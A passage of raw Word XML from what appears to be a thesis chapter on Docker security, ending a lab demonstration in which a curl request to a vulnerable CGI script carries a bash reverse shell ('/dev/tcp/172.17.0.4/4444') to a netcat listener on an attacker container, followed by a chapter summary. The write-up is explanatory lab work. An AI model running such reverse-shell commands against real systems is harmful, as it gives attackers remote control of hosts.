      </w:r>
      <w:r w:rsidR="00F56861">
        <w:t>two containers.</w:t>
      </w:r>
      <w:r w:rsidR="00F92D54">
        <w:t xml:space="preserve"> The first container is used to execute</w:t>
      </w:r>
      <w:r w:rsidR="00AF1608">
        <w:t xml:space="preserve"> curl</w:t>
      </w:r>
      <w:r w:rsidR="00F92D54">
        <w:t xml:space="preserve"> script </w:t>
      </w:r>
      <w:r w:rsidR="006A7937">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00B118E5">
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidR="006A7937">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C678D9">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="006A7937">
        <w:t xml:space="preserve"> bash</w:t>
      </w:r>
      <w:r w:rsidR="00C678D9">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:r w:rsidR="006A7937">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C678D9">
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidR="006A7937">
        <w:t>the victim container</w:t>
      </w:r>
      <w:r w:rsidR="005F08D9">
        <w:t>, as shown in figure 55</w:t>
      </w:r>
      <w:r w:rsidR="00796B88">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00485C7A">
        <w:t xml:space="preserve"> While the second container is used to</w:t>
      </w:r>
      <w:r w:rsidR="00076751">
        <w:t xml:space="preserve"> run netcat command </w:t>
      </w:r>
      <w:r w:rsidR="005F08D9">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00076751">
        <w:t xml:space="preserve">wait </w:t>
      </w:r>
      <w:r w:rsidR="001318A9">
        <w:t>for the connection</w:t>
      </w:r>
      <w:r w:rsidR="00485C7A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F12C10">
        <w:t>on port 4444</w:t>
      </w:r>
      <w:r w:rsidR="00721CFA">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00175744">
        <w:t xml:space="preserve"> The commands used in figure </w:t>
      </w:r>
      <w:r w:rsidR="00BE52DB">
        <w:t>55 are explained below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA97A5" w14:textId="050A3DEE" w:rsidR="001318A9" w:rsidRDefault="00A02B85" w:rsidP="001318A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Curl -H “user-agent” </w:t>
      </w:r>
      <w:r w:rsidR="00791DEA">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sends </w:t>
      </w:r>
      <w:r w:rsidR="00574593">
        <w:t>http header</w:t>
      </w:r>
      <w:r w:rsidR="002B2137">
        <w:t xml:space="preserve"> to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D19B856" w14:textId="51748045" w:rsidR="0007125B" w:rsidRDefault="0007125B" w:rsidP="001318A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/bin/bash</w:t>
      </w:r>
      <w:r w:rsidR="00E42042">
        <w:t xml:space="preserve"> -c </w:t>
      </w:r>
      <w:r w:rsidR="00CA2605">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00E42042">
        <w:t>invo</w:t>
      </w:r>
      <w:r w:rsidR="00C96B65">
        <w:t>kes the bin/bash shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09137B08" w14:textId="56BEDF97" w:rsidR="00C96B65" w:rsidRDefault="00A3335D" w:rsidP="001318A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -i </w:t>
      </w:r>
      <w:r w:rsidR="00CA2605">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">starts the bash </w:t>
      </w:r>
      <w:r w:rsidR="00AC466B">
        <w:t>for interactive mode so that</w:t>
      </w:r>
      <w:r w:rsidR="008A50B7">
        <w:t xml:space="preserve"> it provides shell prompt to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18345DCD" w14:textId="7E0E8CD4" w:rsidR="00C76912" w:rsidRDefault="00BE03B1" w:rsidP="001318A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>&gt;&amp; /dev/tcp/172.17.0.4/4444</w:t>
      </w:r>
      <w:r w:rsidR="00791DEA">
        <w:t xml:space="preserve"> – redirects </w:t>
      </w:r>
      <w:r w:rsidR="004C3234">
        <w:t>the output of the</w:t>
      </w:r>
      <w:r w:rsidR="00791DEA">
        <w:t xml:space="preserve"> shell to the </w:t>
      </w:r>
      <w:r w:rsidR="004C3234">
        <w:t>172.17.0.4</w:t>
      </w:r>
      <w:r w:rsidR="009D75A3">
        <w:t xml:space="preserve"> (Attacker2</w:t>
      </w:r>
      <w:r w:rsidR="00DC7F9C">
        <w:t xml:space="preserve"> container)</w:t>
      </w:r>
      <w:r w:rsidR="004C3234">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00151CF9">
        <w:t>on port 4444 of TCP connection</w:t>
      </w:r>
      <w:r w:rsidR="00DD1570">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7D40FD" w14:textId="0D7D94F1" w:rsidR="00126C48" w:rsidRDefault="00126C48" w:rsidP="001318A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0&gt;&amp;1 </w:t>
      </w:r>
      <w:r w:rsidR="006C685C">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="007973BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F26A16">
        <w:t xml:space="preserve">tells the system </w:t>
      </w:r>
      <w:r w:rsidR="00DB3734">
        <w:t xml:space="preserve">to use standard </w:t>
      </w:r>
      <w:r w:rsidR="003C3FDD">
        <w:t>output (1)</w:t>
      </w:r>
      <w:r w:rsidR="00AA60CB">
        <w:t xml:space="preserve"> as standard input (0) from the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C7AA88" w14:textId="6FFC0886" w:rsidR="00D44840" w:rsidRDefault="00D649A7" w:rsidP="001318A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId69" w:history="1">
        <w:r w:rsidRPr="00A20EB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://172.17.0.2:80/cgi-bin/vulneable</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00D44840">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E6E36">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B15C6">
        <w:t>the victim’s</w:t>
      </w:r>
      <w:r w:rsidR="00027A14">
        <w:t xml:space="preserve"> container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DFE967" w14:textId="593C61F7" w:rsidR="00027A14" w:rsidRDefault="00E01467" w:rsidP="00027A14">
      <w:r>
        <w:t xml:space="preserve">In a </w:t>
      </w:r>
      <w:r w:rsidR="003B417A">
        <w:t>nutshell, the command ‘bash -I &gt;&amp; /dev/tcp/172.17.0.4/4444 0&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidR="00E87E6D">
        <w:t xml:space="preserve">’ launches a bash shell on the victim’s </w:t>
      </w:r>
      <w:r w:rsidR="00483524">
        <w:t xml:space="preserve">container, </w:t>
      </w:r>
      <w:r w:rsidR="00413E69">
        <w:t>with TCP connection coming from port 4444.</w:t>
      </w:r>
      <w:r w:rsidR="00A226D9">
        <w:t xml:space="preserve"> Thus,</w:t>
      </w:r>
      <w:r w:rsidR="006966E2">
        <w:t xml:space="preserve"> it allows the </w:t>
      </w:r>
      <w:r w:rsidR="00DF4712">
        <w:t xml:space="preserve">attacker </w:t>
      </w:r>
      <w:r w:rsidR="00C07AB6">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00DF4712">
        <w:t xml:space="preserve">connect back to the netcat </w:t>
      </w:r>
      <w:r w:rsidR="00563288">
        <w:t>listener on 172.17.0.4, as shown in figure 56</w:t>
      </w:r>
      <w:r w:rsidR="00C07AB6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AE2DA5">
        <w:t xml:space="preserve"> Now, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="007805F5">
        <w:t xml:space="preserve">managed to connect to the </w:t>
      </w:r>
      <w:r w:rsidR="006C3CE1">
        <w:t>target container and can run any commands</w:t>
      </w:r>
      <w:r w:rsidR="00837FA0">
        <w:t xml:space="preserve"> shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="00F748AF">
        <w:t>57</w:t>
      </w:r>
      <w:r w:rsidR="00B15697">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224C6E02" w14:textId="36CFCBEA" w:rsidR="0069314B" w:rsidRDefault="00052F03" w:rsidP="00563288">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="194" w:name="_Toc86858646"/>
      <w:bookmarkStart w:id="195" w:name="_Toc86867536"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0321247B" wp14:editId="32894FB5">
            <wp:extent cx="5581650" cy="243648"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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581650" cy="243648"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00175744" w:rsidRPr="0069314B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00175744" w:rsidRPr="0069314B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00175744" w:rsidRPr="0069314B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00175744" w:rsidRPr="0069314B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
      <w:r w:rsidR="00175744" w:rsidRPr="0069314B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00175744" w:rsidRPr="0069314B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00630B30" w:rsidRPr="0069314B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse shell commands</w:t>
      </w:r>
      <w:r w:rsidR="00563288">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="194"/>
      <w:bookmarkEnd w:id="195"/>
    </w:p>
    <w:p w14:paraId="2BEFAC52" w14:textId="39F5BBCC" w:rsidR="00640F23" w:rsidRDefault="00EF005F" w:rsidP="00EF005F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AED939A" wp14:editId="7477FB6F">
            <wp:extent cx="5340350" cy="639588"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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340350" cy="639588"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23325F4C" w14:textId="2DD81C15" w:rsidR="00EF005F" w:rsidRDefault="00EF005F" w:rsidP="00872EC6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="196" w:name="_Toc86858647"/>
      <w:bookmarkStart w:id="197" w:name="_Toc86867537"/>
      <w:r w:rsidRPr="00872EC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00872EC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00872EC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00872EC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidRPr="00872EC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00872EC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Netcat listener on </w:t>
      </w:r>
      <w:r w:rsidR="00872EC6" w:rsidRPr="00872EC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attacker2 container.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="196"/>
      <w:bookmarkEnd w:id="197"/>
    </w:p>
    <w:p w14:paraId="02FA6B57" w14:textId="1D820A80" w:rsidR="00F155DB" w:rsidRPr="00F155DB" w:rsidRDefault="00B227E9" w:rsidP="00F155DB">
      <w:r>
        <w:t>Figure 57 shows the attacker</w:t>
      </w:r>
      <w:r w:rsidR="001E1DB6">
        <w:t xml:space="preserve"> was able to</w:t>
      </w:r>
      <w:r w:rsidR="00F833CC">
        <w:t xml:space="preserve"> list the files </w:t>
      </w:r>
      <w:r w:rsidR="00F016B3">
        <w:t>content</w:t>
      </w:r>
      <w:r w:rsidR="00F833CC">
        <w:t xml:space="preserve"> on the target container remotely</w:t>
      </w:r>
      <w:r w:rsidR="00346D57">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4EE21B" w14:textId="7EC754D5" w:rsidR="00113B36" w:rsidRDefault="00F155DB" w:rsidP="00925D80">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69032FBF" wp14:editId="099CDD39">
            <wp:extent cx="5439590" cy="869950"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635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443823" cy="870627"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="400E6CA9" w14:textId="7B7F4DA9" w:rsidR="00925D80" w:rsidRDefault="00925D80" w:rsidP="00346D57">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="198" w:name="_Toc86858648"/>
      <w:bookmarkStart w:id="199" w:name="_Toc86867538"/>
      <w:r w:rsidRPr="00346D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00346D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00346D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00346D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>57</w:t>
      </w:r>
      <w:r w:rsidRPr="00346D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00346D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Attacker </w:t>
      </w:r>
      <w:r w:rsidR="00352432" w:rsidRPr="00346D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lists the files on the target container</w:t>
      </w:r>
      <w:r w:rsidR="00B227E9" w:rsidRPr="00346D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="198"/>
      <w:bookmarkEnd w:id="199"/>
    </w:p>
    <w:p w14:paraId="387878CE" w14:textId="61DF921F" w:rsidR="00C03AB3" w:rsidRDefault="00C03AB3" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="200" w:name="_Toc87032940"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="200"/>
    </w:p>
    <w:p w14:paraId="58F594DD" w14:textId="37060321" w:rsidR="00F748AF" w:rsidRDefault="00DC3359" w:rsidP="00F748AF">
      <w:r>
        <w:t xml:space="preserve">This chapter </w:t>
      </w:r>
      <w:r w:rsidR="00E02394">
        <w:t>illust</w:t>
      </w:r>
      <w:r w:rsidR="003A10C5">
        <w:t>rated the security stance of Docker</w:t>
      </w:r>
      <w:r w:rsidR="002A4751">
        <w:t xml:space="preserve"> using three different attacks.</w:t>
      </w:r>
      <w:r w:rsidR="003203B5">
        <w:t xml:space="preserve"> The procedures and </w:t>
      </w:r>
      <w:r w:rsidR="001C78BD">
        <w:t>approaches used for each attack w</w:t>
      </w:r>
      <w:r w:rsidR="00280B7A">
        <w:t>ere</w:t>
      </w:r>
      <w:r w:rsidR="001C78BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA0A7C">
        <w:t xml:space="preserve">documented </w:t>
      </w:r>
      <w:r w:rsidR="007C2BFB">
        <w:t>with screenshots</w:t>
      </w:r>
      <w:r w:rsidR="00AC66DC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00072ED6">
        <w:t xml:space="preserve"> Th</w:t>
      </w:r>
      <w:r w:rsidR="00E11929">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="009F1A71">
        <w:t xml:space="preserve"> au</w:t>
      </w:r>
      <w:r w:rsidR="004C4F74">
        <w:t xml:space="preserve">thor has faced </w:t>
      </w:r>
      <w:r w:rsidR="00D84BD9">
        <w:t xml:space="preserve">several challenges </w:t>
      </w:r>
      <w:r w:rsidR="00382561">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00D84BD9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001621DA">
        <w:t>testing</w:t>
      </w:r>
      <w:r w:rsidR="007D440E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E1147">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="001621DA">
        <w:t xml:space="preserve">experimenting </w:t>
      </w:r>
      <w:r w:rsidR="004E1147">
        <w:t>for each attack</w:t>
      </w:r>
      <w:r w:rsidR="003F0E10">
        <w:t xml:space="preserve">, as this chapter requires </w:t>
      </w:r>
      <w:r w:rsidR="00E46D99">
        <w:t xml:space="preserve">more </w:t>
      </w:r>
      <w:r w:rsidR="00B26B87">
        <w:t>knowledge and skills on Docker architecture</w:t>
      </w:r>
      <w:r w:rsidR="00D9449B">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00DE4DC2">
        <w:t>Linux commands.</w:t>
      </w:r>
      <w:r w:rsidR="00BB3051">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE7E8D">
        <w:t>However, the attacks were completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7217C8F6" w14:textId="7881B114" w:rsidR="00280B7A" w:rsidRPr="00F748AF" w:rsidRDefault="00280B7A" w:rsidP="00F748AF">
      <w:r>
        <w:t xml:space="preserve">The next chapter will </w:t>
      </w:r>
      <w:r w:rsidR="00E775CE">
        <w:t xml:space="preserve">discuss in detail the results </w:t>
      </w:r>
      <w:r w:rsidR="00F603CB">
        <w:t xml:space="preserve">obtained </w:t>
      </w:r>
      <w:r w:rsidR="00532771">
        <w:t>from the experim</w:t>
      </w:r>
      <w:r w:rsidR="00C663FF">
        <w:t>entation of each attack</w:t>
      </w:r>
      <w:r w:rsidR="00F603CB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB6C226" w14:textId="77777777" w:rsidR="00C03AB3" w:rsidRPr="00C03AB3" w:rsidRDefault="00C03AB3" w:rsidP="00C03AB3"/>
    <w:p w14:paraId="26F0CBCE" w14:textId="77777777" w:rsidR="00925D80" w:rsidRDefault="00925D80" w:rsidP="00113B36"/>
    <w:p w14:paraId="7D8A0453" w14:textId="77777777" w:rsidR="00925D80" w:rsidRPr="00113B36" w:rsidRDefault="00925D80" w:rsidP="00113B36"/>
    <w:p w14:paraId="41E4CE96" w14:textId="20FE956E" w:rsidR="00563288" w:rsidRDefault="00563288" w:rsidP="00DC0ABB"/>
    <w:p w14:paraId="2F8428E8" w14:textId="7DF52DA3" w:rsidR="002B02B6" w:rsidRPr="00DC0ABB" w:rsidRDefault="00563288" w:rsidP="00DC0ABB">
      <w:r>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFC6EA9" w14:textId="77777777" w:rsidR="007D6CE5" w:rsidRPr="007D6CE5" w:rsidRDefault="007D6CE5" w:rsidP="007D6CE5"/>
    <w:p w14:paraId="0FC7FEF9" w14:textId="77777777" w:rsidR="00477923" w:rsidRPr="008A0C5A" w:rsidRDefault="00477923" w:rsidP="00567768">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01534FB5" w14:textId="297EA5A7" w:rsidR="00C731FE" w:rsidRPr="00C731FE" w:rsidRDefault="00C731FE" w:rsidP="00C731FE"/>
    <w:p w14:paraId="0133D1DE" w14:textId="77777777" w:rsidR="001000EB" w:rsidRDefault="001000EB" w:rsidP="00D97597"/>
    <w:p w14:paraId="7F3CEF71" w14:textId="77777777" w:rsidR="00EF18DD" w:rsidRPr="00D97597" w:rsidRDefault="00EF18DD" w:rsidP="00D97597"/>
